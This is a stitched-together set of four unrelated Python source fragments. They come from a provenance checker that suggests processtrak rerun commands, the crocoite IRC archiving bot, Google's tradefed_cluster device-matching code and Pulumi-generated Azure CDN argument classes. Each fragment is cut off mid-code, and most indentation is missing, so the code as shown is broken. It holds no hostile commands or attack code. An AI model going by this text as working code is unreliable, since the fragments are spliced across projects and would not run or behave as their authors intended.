action=find_process_value_or_ancestor_text(foundelement[0],"lip:action",default="")
prxhrefc=href_context.fromxml(xmldocu,find_process_value_or_ancestor(foundelement[0],"lip:wascontrolledby/lip:prxfile"))
prxfiles.add(prxhrefc)
if not prxhrefc in suggestions_by_prxfile:
suggestions_by_prxfile[prxhrefc]=set([])
pass
suggestions_by_prxfile[prxhrefc].add((inputfilehrefc,action))
pass
pass
pass
pass
pass
# go through each prxfile and suggest steps in order
# We don't worry about sorting prxfiles, because
# we don't expect to have multiple prxfiles
for prxfile_hrefc in prxfiles:
from . import xmldoc # don't want this in top-of-file because it creates a circular reference
from . import dc_value # don't want this in top-of-file because it creates a circular reference
print("prxfile_hrefc=%s" % (prxfile_hrefc.humanurl()))
prxfile_doc=xmldoc.xmldoc.loadhref(dc_value.hrefvalue(prxfile_hrefc),nsmap={"prx":"http://limatix.org/processtrak/processinginstructions","xlink":"http://www.w3.org/1999/xlink"})
prxfile_steps=prxfile_doc.xpath("prx:step")
prxfile_inputfiles=prxfile_doc.xpath("prx:inputfiles/prx:inputfile")
for step in prxfile_steps:
stepaction=processtrak_prxdoc.getstepname(prxfile_doc,step)
refdinputhrefcs=[inputfilehrefc for (inputfilehrefc,action) in suggestions_by_prxfile[prxfile_hrefc] if action==stepaction]
for refdinputhrefc in refdinputhrefcs:
suggestions_by_prxfile[prxfile_hrefc].remove((refdinputhrefc,stepaction))
# processtrak takes <inputfile> tag of prxfile
# Search for match between refdinputfile and the inputfiles specified in prx document
foundinputfile=False
for prxinputfile_el in prxfile_inputfiles:
prxinputfile_hrefc=href_context.fromxml(prxfile_doc,prxinputfile_el)
# prxinputfile=prxfile_doc.gettext(prxinputfile_el)
# if os.path.isabs(prxinputfile):
# prxinputfile_fullpath=prxinputfile
# pass
# else:
# prxinputfile_fullpath=os.path.join(prxfile_dir,prxinputfile)
# pass
# prxinputfile_canonpath=canonicalize_path.canonicalize_path(prxinputfile_fullpath)
# refdinputfile_canonpath=canonicalize_path.canonicalize_path(refdinputfile)
# print "prxinputfile=",prxinputfile_canonpath
# print "refdinputfile=",refdinputfile_canonpath
if prxinputfile_hrefc==refdinputhrefc:
foundinputfile=True
suggestions.add(("Rerun step %s on file %s." % (stepaction,prxinputfile_hrefc.humanurl()),"processtrak -s %s -f %s %s" % (addquotesifnecessary(stepaction),addquotesifnecessary(prxinputfile_hrefc.getpath()),addquotesifnecessary(prxfile_hrefc.getpath()))))
break
pass
if not foundinputfile:
sys.stderr.write("Could not find reference to input file %s in %s\n" % (refdinputhrefc.humanurl(),prxfile_hrefc.humanurl()))
pass
pass
pass
for (inputfilehrefc,stepaction) in suggestions_by_prxfile[prxfile_hrefc]:
sys.stderr.write("Unknown (inputfile,stepname) for %s: (%s,%s)\n" % (prxfile_hrefc.humanurl(),inputfilehrefc.humanurl(),stepaction))
pass
pass
return suggestions
def checkprovenance(history_stack,element_hrefc,refuuids_or_mtime,nsmap={},referrer_hrefc="",warnlevel="error",docdict=None,processdict=None,processdictbyhrefc=None,processdictbyusedelement=None,elementdict=None,globalmessagelists=None):
# Find the provenance of element_hrefc
# start with a history_stack of ""
# refuuids_or_mtime is None or the expected "uuid=" or "mtime=" provenance of this particular element
# docdict, processdict, processdictbyhrefc, processdictbyusedelement, elementdict, and global messagelists should be empty. They will be filled
#
# docdict: cached dictionary by fragless hrefc of xmldoc documents
# processdict: cached dictionary by uuid of (hrefcs to lip:process elements, [list of (element hrefc,uuid_or_mtime)],messagelists,parent_process_uuid_or_None) ... parent process is implicit WasControlledBy
# processdictbyhrefc: dictionary by hrefc of uuids for processdict
# processdictbyusedelement: dictionary by (element hrefc,uuid_or_mtime) of [list of uuids for processes that used that element ]
# elementdict dictionary by (hrefc,uuid_or_mtime) tuples that we have processed of ([list of process uuids],messagelists)
# messagelists & globalmessagelists: dictionary by error type of lists of error messages
# Currently ignore pymodule references.
# note: functionality of referrer_hrefc mostly replaced by history_stack
new_history_stack=history_stack+"/"+element_hrefc.humanurl()
if refuuids_or_mtime is not None:
refuuids_or_mtime=str(refuuids_or_mtime) # in case it is some sort of alternate string
pass
if docdict is None:
docdict={}
pass
if processdict is None:
processdict={}
pass
if processdictbyhrefc is None:
processdictbyhrefc={}
pass
if processdictbyusedelement is None:
processdictbyusedelement={}
pass
if elementdict is None:
elementdict={}
pass
if globalmessagelists is None:
globalmessagelists={"error": [],
"warning": [],
"info": [],
"none": []}
pass
messagelisttemplate={"error": [],
"warning": [],
"info": [],
"none": []}
# fh=file("/tmp/provlog","a")
# fh.write(element_hrefc+"\t"+str(refuuids_or_mtime)+"\n")
# fh.close()
if (element_hrefc,refuuids_or_mtime) in elementdict:
return # already processed this element
# NOTE: Can probably optimize here. When refuuid_or_mtime is passed as None -- implying current element -- is there a way to automatically identify if we have previously processed it?... less of an issue now that checkallprovenance passes refuuid_or_mtime
if element_hrefc in processdictbyhrefc:
return # already processed this lip:process element
# sys.stderr.write("element_hrefc="+str(element_hrefc)+"\n")
filehrefc=element_hrefc.fragless()
# sys.stderr.write("filehrefc="+str(filehrefc)+"\n")
#(filepath,etxpath)=canonicalize_path.canonical_etxpath_break_out_file(element_etxpath)
if element_hrefc.has_fragment():
# not just a file...
# load file and extract provenance uuids if possible
if refuuids_or_mtime is not None and refuuids_or_mtime.startswith("mtime="):
# mtime specified on something with a fragment
errmsg="Attempting to specify mtime provenance %s for an element %s inside a file. Referrer=%s" % (refuuids_or_mtime,element_hrefc.humanurl(),referrer_hrefc.humanurl())
if referrer_hrefc in processdictbyhrefc:
processdict[processdictbyhrefc[referrer_hrefc]][2]["error"].append(errmsg)
pass
else:
globalmessagelists["error"].append(errmsg)
pass
pass
if filehrefc in docdict:
xmldocu=docdict[filehrefc]
pass
else :
xmldocu=None
try :
from . import xmldoc # don't want this in top-of-file because it creates a circular reference
from . import dc_value # don't want this in top-of-file because it creates a circular reference
xmldocu=xmldoc.xmldoc.loadhref(dc_value.hrefvalue(filehrefc.fragless()))
pass
except IOError:
errmsg="URL %s missing for %s referred by %s." % (filehrefc.humanurl(),element_hrefc.humanurl(),referrer_hrefc.humanurl())
sys.stderr.write(errmsg+"\n")
if referrer_hrefc in processdictbyhrefc:
processdict[processdictbyhrefc[referrer_hrefc]][2]["error"].append(errmsg)
pass
else :
globalmessagelists["error"].append(errmsg)
pass
pass
docdict[filehrefc]=xmldocu
pass
if xmldocu is None:
return # nothing to do... error would have been diagnosed above
foundelement=element_hrefc.evaluate_fragment(xmldocu,None,noprovenance=True)
if len(foundelement)==0:
elementdict[(element_hrefc,refuuids_or_mtime)]=([],copy.deepcopy(messagelisttemplate)) # mark that we have done this
# Add error message to messagelists
elementdict[(element_hrefc,refuuids_or_mtime)][1]["error"].append("Object %s missing referred by via %s" % (element_hrefc.humanurl(),history_stack)) #,referrer_hrefc.humanurl()))
pass
elif len(foundelement) > 1:
elementdict[(element_hrefc,refuuids_or_mtime)]=([],copy.deepcopy(messagelisttemplate)) # mark that we have done this
# add error to messagelists
| |
# Copyright (c) 2017–2018 crocoite contributors
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
# THE SOFTWARE.
"""
IRC bot “chromebot”
"""
import asyncio, argparse, json, tempfile, time, random, os, shlex
from datetime import datetime
from urllib.parse import urlsplit
from enum import IntEnum, unique
from collections import defaultdict
from abc import abstractmethod
from functools import wraps
import bottom
import websockets
from .util import StrJsonEncoder
from .cli import cookie
### helper functions ###
def prettyTimeDelta (seconds):
"""
Pretty-print seconds to human readable string 1d 1h 1m 1s
"""
seconds = int(seconds)
days, seconds = divmod(seconds, 86400)
hours, seconds = divmod(seconds, 3600)
minutes, seconds = divmod(seconds, 60)
s = [(days, 'd'), (hours, 'h'), (minutes, 'm'), (seconds, 's')]
s = filter (lambda x: x[0] != 0, s)
return ' '.join (map (lambda x: '{}{}'.format (*x), s))
def prettyBytes (b):
"""
Pretty-print bytes
"""
prefixes = ['B', 'KiB', 'MiB', 'GiB', 'TiB']
while b >= 1024 and len (prefixes) > 1:
b /= 1024
prefixes.pop (0)
return f'{b:.1f} {prefixes[0]}'
def isValidUrl (s):
url = urlsplit (s)
if url.scheme and url.netloc and url.scheme in {'http', 'https'}:
return s
raise TypeError ()
class NonExitingArgumentParser (argparse.ArgumentParser):
""" Argument parser that does not call exit(), suitable for interactive use """
def exit (self, status=0, message=None):
# should never be called
pass
def error (self, message):
# if we use subparsers it’s important to return self, so we can show
# the correct help
raise Exception (self, message)
def format_usage (self):
return super().format_usage ().replace ('\n', ' ')
class Status(IntEnum):
""" Job status """
undefined = 0
pending = 1
running = 2
aborted = 3
finished = 4
# see https://arxiv.org/html/0901.4016 on how to build proquints (human
# pronouncable unique ids)
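# For example, uintToQuint(0x7F000001, 2) below yields 'lusab-babad', which is the paper's
# encoding of the IPv4 address 127.0.0.1.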
toConsonant = 'bdfghjklmnprstvz'
toVowel = 'aiou'
def u16ToQuint (v):
""" Transform a 16 bit unsigned integer into a single quint """
assert 0 <= v < 2**16
# quints are “big-endian”
return ''.join ([
toConsonant[(v>>(4+2+4+2))&0xf],
toVowel[(v>>(4+2+4))&0x3],
toConsonant[(v>>(4+2))&0xf],
toVowel[(v>>4)&0x3],
toConsonant[(v>>0)&0xf],
])
def uintToQuint (v, length=2):
""" Turn any integer into a proquint with fixed length """
assert 0 <= v < 2**(length*16)
return '-'.join (reversed ([u16ToQuint ((v>>(x*16))&0xffff) for x in range (length)]))
def makeJobId ():
""" Create job id from time and randomness source """
# allocate 48 bits for the time (in milliseconds) and add 16 random bits
# at the end (just to be sure) for a total of 64 bits. Should be enough to
# avoid collisions.
randbits = 16
stamp = (int (time.time ()*1000) << randbits) | random.randint (0, 2**randbits-1)
return uintToQuint (stamp, 4)
class Job:
""" Archival job """
__slots__ = ('id', 'stats', 'rstats', 'started', 'finished', 'nick', 'status', 'process', 'url')
def __init__ (self, url, nick):
self.id = makeJobId ()
self.stats = {}
self.rstats = {}
self.started = datetime.utcnow ()
self.finished = None
self.url = url
# user who scheduled this job
self.nick = nick
self.status = Status.pending
self.process = None
def formatStatus (self):
stats = self.stats
rstats = self.rstats
return (f"{self.url} ({self.id}) {self.status.name}. "
f"{rstats.get ('have', 0)} pages finished, "
f"{rstats.get ('pending', 0)} pending; "
f"{stats.get ('crashed', 0)} crashed, "
f"{stats.get ('requests', 0)} requests, "
f"{stats.get ('failed', 0)} failed, "
f"{prettyBytes (stats.get ('bytesRcv', 0))} received.")
@unique
class NickMode(IntEnum):
# the actual numbers don’t matter, but their order must be strictly
    # increasing (with privilege level)
operator = 100
voice = 10
@classmethod
def fromMode (cls, mode):
return {'v': cls.voice, 'o': cls.operator}[mode]
@classmethod
def fromNickPrefix (cls, mode):
return {'@': cls.operator, '+': cls.voice}[mode]
@property
def human (self):
return {self.operator: 'operator', self.voice: 'voice'}[self]
class User:
""" IRC user """
__slots__ = ('name', 'modes')
def __init__ (self, name, modes=None):
self.name = name
self.modes = modes or set ()
def __eq__ (self, b):
return self.name == b.name
def __hash__ (self):
return hash (self.name)
def __repr__ (self):
return f'<User {self.name} {self.modes}>'
def hasPriv (self, p):
if p is None:
return True
else:
return self.modes and max (self.modes) >= p
@classmethod
def fromName (cls, name):
""" Get mode and name from NAMES command """
try:
modes = {NickMode.fromNickPrefix (name[0])}
name = name[1:]
except KeyError:
modes = set ()
return cls (name, modes)
class ReplyContext:
__slots__ = ('client', 'target', 'user')
def __init__ (self, client, target, user):
self.client = client
self.target = target
self.user = user
def __call__ (self, message):
self.client.send ('PRIVMSG', target=self.target,
message=f'{self.user.name}: {message}')
class RefCountEvent:
"""
Ref-counted event that triggers if a) armed and b) refcount drops to zero.
Must be used as a context manager.
"""
__slots__ = ('count', 'event', 'armed')
def __init__ (self):
self.armed = False
self.count = 0
self.event = asyncio.Event ()
def __enter__ (self):
self.count += 1
self.event.clear ()
def __exit__ (self, exc_type, exc_val, exc_tb):
self.count -= 1
if self.armed and self.count == 0:
self.event.set ()
async def wait (self):
await self.event.wait ()
def arm (self):
self.armed = True
if self.count == 0:
self.event.set ()
class ArgparseBot (bottom.Client):
"""
Simple IRC bot using argparse
Tracks user’s modes, reconnects on disconnect
"""
__slots__ = ('channels', 'nick', 'parser', 'users', '_quit')
def __init__ (self, host, port, ssl, nick, logger, channels=None, loop=None):
super().__init__ (host=host, port=port, ssl=ssl, loop=loop)
self.channels = channels or []
self.nick = nick
# map channel -> nick -> user
self.users = defaultdict (dict)
self.logger = logger.bind (context=type (self).__name__)
self.parser = self.getParser ()
# bot does not accept new queries in shutdown mode, unless explicitly
# permitted by the parser
self._quit = RefCountEvent ()
# register bottom event handler
self.on('CLIENT_CONNECT', self.onConnect)
self.on('PING', self.onKeepalive)
self.on('PRIVMSG', self.onMessage)
self.on('CLIENT_DISCONNECT', self.onDisconnect)
self.on('RPL_NAMREPLY', self.onNameReply)
self.on('CHANNELMODE', self.onMode)
self.on('PART', self.onPart)
self.on('JOIN', self.onJoin)
# XXX: we would like to handle KICK, but bottom does not support that at the moment
@abstractmethod
def getParser (self):
pass
def cancel (self):
self.logger.info ('cancel', uuid='1eb34aea-a854-4fec-90b2-7f8a3812a9cd')
self._quit.arm ()
async def run (self):
await self.connect ()
await self._quit.wait ()
self.send ('QUIT', message='Bye.')
await self.disconnect ()
async def onConnect (self, **kwargs):
self.logger.info ('connect', nick=self.nick, uuid='01f7b138-ea53-4609-88e9-61f3eca3e7e7')
self.send('NICK', nick=self.nick)
self.send('USER', user=self.nick, realname='https://github.com/PromyLOPh/crocoite')
# Don't try to join channels until the server has
# sent the MOTD, or signaled that there's no MOTD.
done, pending = await asyncio.wait(
[self.wait('RPL_ENDOFMOTD'), self.wait('ERR_NOMOTD')],
loop=self.loop, return_when=asyncio.FIRST_COMPLETED)
# Cancel whichever waiter's event didn't come in.
for future in pending:
future.cancel()
for c in self.channels:
self.logger.info ('join', channel=c, uuid='367063a5-9069-4025-907c-65ba88af8593')
self.send ('JOIN', channel=c)
# no need for NAMES here, server sends this automatically
async def onNameReply (self, channel, users, **kwargs):
		# a channel's user list may be too big for a single NAMES message
addusers = dict (map (lambda x: (x.name, x), map (User.fromName, users)))
if channel not in self.users:
self.users[channel] = addusers
else:
self.users[channel].update (addusers)
@staticmethod
def parseMode (mode):
""" Parse mode strings like +a, -b, +a-b, -b+a, … """
action = '+'
ret = []
for c in mode:
if c in {'+', '-'}:
action = c
else:
ret.append ((action, c))
return ret
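    # e.g. parseMode ('+o')   -> [('+', 'o')]
    #      parseMode ('+a-b') -> [('+', 'a'), ('-', 'b')]
    #      parseMode ('-b+a') -> [('-', 'b'), ('+', 'a')]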
async def onMode (self, channel, modes, params, **kwargs):
if channel not in self.channels:
return
for (action, mode), nick in zip (self.parseMode (modes), params):
try:
m = NickMode.fromMode (mode)
u = self.users[channel].get (nick, User (nick))
if action == '+':
u.modes.add (m)
elif action == '-':
u.modes.remove (m)
except KeyError:
# unknown mode, ignore
pass
async def onPart (self, nick, channel, **kwargs):
		if channel not in self.channels:
			return
		self.users[channel].pop (nick, None)
# Lint as: python2, python3
# Copyright 2019 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Command task matcher is used to matcher tasks against a host."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from collections import defaultdict, namedtuple
import logging
import six
from tradefed_cluster import common
_OPERATOR_TO_PREDICTOR = {
'=': lambda a, b: a == b,
'>': lambda a, b: a > b,
'>=': lambda a, b: a >= b,
'<': lambda a, b: a < b,
'<=': lambda a, b: a <= b,
}
Device = namedtuple('Device', ['device_serial', 'run_target', 'attributes'])
RunTarget = namedtuple('RunTarget', ['name', 'group', 'devices'])
Group = namedtuple('Group', ['name', 'run_targets'])
class CommandTaskMatcher(object):
"""CommandTaskMatcher is used to matcher tasks against a host.
go/atp-multiple-device-match-design-doc has more details
about matching algorithm.
"""
def __init__(self, host_info):
"""Create a new CommandTaskMatcher.
Args:
host_info: a HostInfo message.
"""
# A group name to group map. It represents the device tree.
self._groups = self._BuildGroupTrees(host_info.device_infos)
# A run target to {device serial: device} map. It's an index for run target.
self._run_target_index = self._BuildRunTargetIndex(self._groups)
def _BuildGroupTrees(self, devices):
"""Build device trees for groups.
    Create a map from group name to group tree that only contains
    groups that are not in use and have available devices.
Args:
devices: a list of DeviceInfo.
Returns:
a group name to group map.
"""
allocated_group = set([])
for d in devices:
if not d.group_name:
# if a device doesn't belong to any group,
# then its serial will be its group name.
d.group_name = d.device_serial
if d.state == common.DeviceState.ALLOCATED:
logging.debug('Group %s is in use.', d.group_name)
allocated_group.add(d.group_name)
group_devices = defaultdict(list)
for d in devices:
if d.group_name in allocated_group:
continue
if d.state != common.DeviceState.AVAILABLE:
continue
group_devices[d.group_name].append(d)
group_map = {}
for group_name, devices in six.iteritems(group_devices):
group = self._BuildGroupSubtree(group_name, devices)
group_map[group_name] = group
return group_map
def _BuildGroupSubtree(self, group_name, devices):
"""Build a group subtree.
The created group tree only includes available devices.
    If there is no device available under the group,
return None.
Args:
group_name: group name
devices: devices iter under the group
Returns:
a group if the group has available devices, otherwise None
"""
group = Group(name=group_name, run_targets={})
for d in devices:
run_target = group.run_targets.setdefault(
d.run_target,
RunTarget(name=d.run_target, group=group, devices={}))
run_target.devices[d.device_serial] = Device(
device_serial=d.device_serial,
run_target=run_target,
attributes=self._GetDeviceAttributes(d))
if group.run_targets:
return group
return None
def _GetDeviceAttributes(self, device):
"""Get device's attributes.
Args:
device: a message.DeviceInfo.
Returns:
device's attributes that can be used to schedule tests.
"""
    # TODO: To start with, we only allow a limited set of device attributes
    # for scheduling tests; we will make it more flexible later.
attributes = {}
attributes['build_id'] = device.build_id
attributes['device_serial'] = device.device_serial
attributes['hostname'] = device.hostname
attributes['product'] = device.product
attributes['product_variant'] = device.product_variant
attributes['sim_state'] = device.sim_state
attributes['battery_level'] = device.battery_level
return attributes
def _BuildRunTargetIndex(self, groups):
"""Build run target to devices map.
It's like an index from run target to devices.
Args:
groups: a map from group name to Group objects
Returns:
run target to device list
"""
run_target_to_devices = {}
for group in six.itervalues(groups):
for d in self._ListGroupDevices(group):
run_target_to_devices.setdefault(
d.run_target.name, {})[d.device_serial] = d
return run_target_to_devices
def _ListGroupDevices(self, group):
"""Get all devices under a group.
Args:
group: a Group object
Yields:
devices under a group
"""
for run_target in six.itervalues(group.run_targets):
for d in six.itervalues(run_target.devices):
yield d
def Match(self, command_task):
"""Match a command task against.
Args:
command_task: a CommandTask object
Returns:
a list of matched devices
"""
if len(command_task.test_bench.host.groups) == 1:
if len(command_task.test_bench.host.groups[0].run_targets) == 1:
# type1 test
return self._MatchType1(command_task)
else:
# type2 test
return self._MatchType2(command_task)
else:
# type3 test
return self._MatchType3(command_task)
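  # Illustrative summary of how Match() above classifies a test bench
  # (shorthand only, not real field names):
  #   1 group, 1 run target  -> type1 (single device)
  #   1 group, N run targets -> type2 (all devices from one group)
  #   M groups               -> type3 (devices may span several groups)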
def _MatchType1(self, command_task):
"""Match type1 test.
Type1 tests have only one run target.
Args:
command_task: a CommandTask object
Returns:
a list of matched devices
"""
run_target = command_task.run_targets[0]
devices = self._run_target_index.get(run_target)
for device in six.itervalues(devices):
if self._MatchDeviceAttributes(
(command_task.test_bench.host.groups[0].run_targets[0]
.device_attributes),
device.attributes):
return [device]
return None
def _MatchDeviceAttributes(self, required_attributes, device_attributes):
"""Check if a device's attributes match the task's requirements.
Args:
required_attributes: a list of datastore_entities.Attribute.
device_attributes: a map of device's attribute name to its value.
Returns:
True if the device meet the requirements, otherwise False.
"""
if not required_attributes:
return True
for required_attribute in required_attributes:
if not _MatchDeviceAttribute(required_attribute, device_attributes):
return False
return True
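  # Illustrative example for _MatchDeviceAttributes (the attribute is shown as
  # a simple constructor call; real objects are datastore_entities.Attribute,
  # and the values below are made up):
  #   required: [Attribute(name='product', operator='=', value='coral')]
  #   device:   {'product': 'coral', 'device_serial': 'ABC123', ...}
  #   -> True, because _OPERATOR_TO_PREDICTOR['='] compares the two values.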
def _MatchType2(self, command_task):
"""Match type2 test.
type2 tests require multiple devices and
all devices should be under one group.
Args:
command_task: a CommandTask object
Returns:
a list of matched devices
"""
for group in six.itervalues(self._groups):
matched_devices = self._MatchGroup(
group, command_task.test_bench.host.groups[0])
if matched_devices:
return matched_devices
return None
def _MatchGroup(self, device_group, group_requirements):
"""Match a device group against a group requirements.
Args:
device_group: the device group
      group_requirements: the expected group requirements
Returns:
a list of matched devices
"""
logging.debug('Try to match %s against %s',
group_requirements, device_group.name)
matched_devices = []
matched_device_serials = set()
for run_target_requirement in group_requirements.run_targets:
matched = False
run_target_candidate = device_group.run_targets.get(
run_target_requirement.name)
if not run_target_candidate:
logging.debug('No run target %s.', run_target_requirement.name)
return None
for device_candidate in run_target_candidate.devices.values():
if device_candidate.device_serial in matched_device_serials:
continue
if self._MatchDeviceAttributes(
run_target_requirement.device_attributes,
device_candidate.attributes):
matched_devices.append(device_candidate)
matched_device_serials.add(device_candidate.device_serial)
matched = True
break
if not matched:
logging.debug('There is no match for %s.', run_target_requirement)
return None
logging.debug('%s matches requirement %s with %s.',
device_group.name,
group_requirements,
[d.device_serial for d in matched_devices])
return matched_devices
def _MatchType3(self, command_task):
"""Match type3 test.
type3 tests require multiple devices and
those devices can be under different groups.
Groups are not reentrant.
Args:
command_task: a CommandTask object
Returns:
a list of matched devices
"""
    # TODO: The current implementation is not smart enough. First, groups are
    # not reentrant: once a group is matched by some group requirement, other
    # group requirements can not grab this group again.
    # Second, assume the task has two group requirements gr1 and gr2, and the
    # host has two device groups dg1 and dg2. Assume dg1 and dg2 both fulfill
    # gr1, but only dg1 fulfills gr2. There is a possibility that gr1 grabs
    # dg1, gr2 can not be matched, and the whole matching fails, even though
    # the assignment dg2->gr1, dg1->gr2 would have succeeded.
    # This implementation basically only supports tasks that have multiple
    # groups where each group has only one run target.
matched_devices = []
allocated_groups = set()
for group_requirement in command_task.test_bench.host.groups:
logging.debug('Matching group %s', group_requirement)
group_matched_devices = None
group = None
for group in six.itervalues(self._groups):
if group.name in allocated_groups:
continue
group_matched_devices = self._MatchGroup(group, group_requirement)
if group_matched_devices:
break
if group_matched_devices and group:
matched_devices.extend(group_matched_devices)
allocated_groups.add(group.name)
else:
# for some group requirement there is no matching in this host.
logging.debug('Failed to match')
return None
return matched_devices
def RemoveDeviceGroups(self, devices):
"""Remove the devices' groups in the host.
The devices must exist in the device tree.
    This method removes those devices and all other devices in their groups
    from the device tree, since those groups are now in use.
Args:
devices: a list of devices
"""
for d in devices:
# delete the group from the device tree
group = self._groups.pop(d.run_target.group.name, None)
if not group:
continue
# delete all devices under the group from the _run_target_index
for d_in_group in self._ListGroupDevices(group):
self._run_target_index[d_in_group.run_target.name].pop(
d_in_group.device_serial)
def GetRunTargets(self):
"""Get all run targets in this host.
Returns:
a list of run target names
"""
return list(self._run_target_index.keys())
def IsEmpty(self):
"""The host has usable devices or not.
Returns:
true if the host has no usable devices, otherwise false
"""
return not self._groups
def _MatchDeviceAttribute(required_attr, device_attrs):
"""Check if a device's attributes match the task's requirements."""
if required_attr.name not in device_attrs:
logging.debug(
'No %s in %s.',
required_attr.name, device_attrs.get('device_serial'))
return False
operator = required_attr.operator or '='
if operator not in _OPERATOR_TO_PREDICTOR:
# This should never happen, since we check the expression in
# request_api._ParseAttributeRequirement.
raise ValueError('Operator "%s" is not supported.' % operator)
device_attr_value = device_attrs[required_attr.name]
required_value = required_attr.value
required_attribute_value = | |
is enabled for load balancing or not. By default, origin is always enabled.
"""
return pulumi.get(self, "enabled")
@enabled.setter
def enabled(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "enabled", value)
@property
@pulumi.getter(name="httpPort")
def http_port(self) -> Optional[pulumi.Input[int]]:
"""
The value of the HTTP port. Must be between 1 and 65535.
"""
return pulumi.get(self, "http_port")
@http_port.setter
def http_port(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "http_port", value)
@property
@pulumi.getter(name="httpsPort")
def https_port(self) -> Optional[pulumi.Input[int]]:
"""
The value of the HTTPS port. Must be between 1 and 65535.
"""
return pulumi.get(self, "https_port")
@https_port.setter
def https_port(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "https_port", value)
@property
@pulumi.getter(name="originHostHeader")
def origin_host_header(self) -> Optional[pulumi.Input[str]]:
"""
The host header value sent to the origin with each request. If you leave this blank, the request hostname determines this value. Azure CDN origins, such as Web Apps, Blob Storage, and Cloud Services require this host header value to match the origin hostname by default.
"""
return pulumi.get(self, "origin_host_header")
@origin_host_header.setter
def origin_host_header(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "origin_host_header", value)
@property
@pulumi.getter
def priority(self) -> Optional[pulumi.Input[int]]:
"""
        Priority of origin in given origin group for load balancing. Higher priorities will not be used for load balancing if any lower priority origin is healthy. Must be between 1 and 5.
"""
return pulumi.get(self, "priority")
@priority.setter
def priority(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "priority", value)
@property
@pulumi.getter(name="privateLinkAlias")
def private_link_alias(self) -> Optional[pulumi.Input[str]]:
"""
The Alias of the Private Link resource. Populating this optional field indicates that this origin is 'Private'
"""
return pulumi.get(self, "private_link_alias")
@private_link_alias.setter
def private_link_alias(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "private_link_alias", value)
@property
@pulumi.getter(name="privateLinkApprovalMessage")
def private_link_approval_message(self) -> Optional[pulumi.Input[str]]:
"""
A custom message to be included in the approval request to connect to the Private Link.
"""
return pulumi.get(self, "private_link_approval_message")
@private_link_approval_message.setter
def private_link_approval_message(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "private_link_approval_message", value)
@property
@pulumi.getter(name="privateLinkLocation")
def private_link_location(self) -> Optional[pulumi.Input[str]]:
"""
The location of the Private Link resource. Required only if 'privateLinkResourceId' is populated
"""
return pulumi.get(self, "private_link_location")
@private_link_location.setter
def private_link_location(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "private_link_location", value)
@property
@pulumi.getter(name="privateLinkResourceId")
def private_link_resource_id(self) -> Optional[pulumi.Input[str]]:
"""
The Resource Id of the Private Link resource. Populating this optional field indicates that this backend is 'Private'
"""
return pulumi.get(self, "private_link_resource_id")
@private_link_resource_id.setter
def private_link_resource_id(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "private_link_resource_id", value)
@property
@pulumi.getter
def weight(self) -> Optional[pulumi.Input[int]]:
"""
Weight of the origin in given origin group for load balancing. Must be between 1 and 1000
"""
return pulumi.get(self, "weight")
@weight.setter
def weight(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "weight", value)
@pulumi.input_type
class DeliveryRuleCacheExpirationActionArgs:
def __init__(__self__, *,
name: pulumi.Input[str],
parameters: pulumi.Input['CacheExpirationActionParametersArgs']):
"""
Defines the cache expiration action for the delivery rule.
:param pulumi.Input[str] name: The name of the action for the delivery rule.
Expected value is 'CacheExpiration'.
:param pulumi.Input['CacheExpirationActionParametersArgs'] parameters: Defines the parameters for the action.
"""
pulumi.set(__self__, "name", 'CacheExpiration')
pulumi.set(__self__, "parameters", parameters)
@property
@pulumi.getter
def name(self) -> pulumi.Input[str]:
"""
The name of the action for the delivery rule.
Expected value is 'CacheExpiration'.
"""
return pulumi.get(self, "name")
@name.setter
def name(self, value: pulumi.Input[str]):
pulumi.set(self, "name", value)
@property
@pulumi.getter
def parameters(self) -> pulumi.Input['CacheExpirationActionParametersArgs']:
"""
Defines the parameters for the action.
"""
return pulumi.get(self, "parameters")
@parameters.setter
def parameters(self, value: pulumi.Input['CacheExpirationActionParametersArgs']):
pulumi.set(self, "parameters", value)
@pulumi.input_type
class DeliveryRuleCacheKeyQueryStringActionArgs:
def __init__(__self__, *,
name: pulumi.Input[str],
parameters: pulumi.Input['CacheKeyQueryStringActionParametersArgs']):
"""
Defines the cache-key query string action for the delivery rule.
:param pulumi.Input[str] name: The name of the action for the delivery rule.
Expected value is 'CacheKeyQueryString'.
:param pulumi.Input['CacheKeyQueryStringActionParametersArgs'] parameters: Defines the parameters for the action.
"""
pulumi.set(__self__, "name", 'CacheKeyQueryString')
pulumi.set(__self__, "parameters", parameters)
@property
@pulumi.getter
def name(self) -> pulumi.Input[str]:
"""
The name of the action for the delivery rule.
Expected value is 'CacheKeyQueryString'.
"""
return pulumi.get(self, "name")
@name.setter
def name(self, value: pulumi.Input[str]):
pulumi.set(self, "name", value)
@property
@pulumi.getter
def parameters(self) -> pulumi.Input['CacheKeyQueryStringActionParametersArgs']:
"""
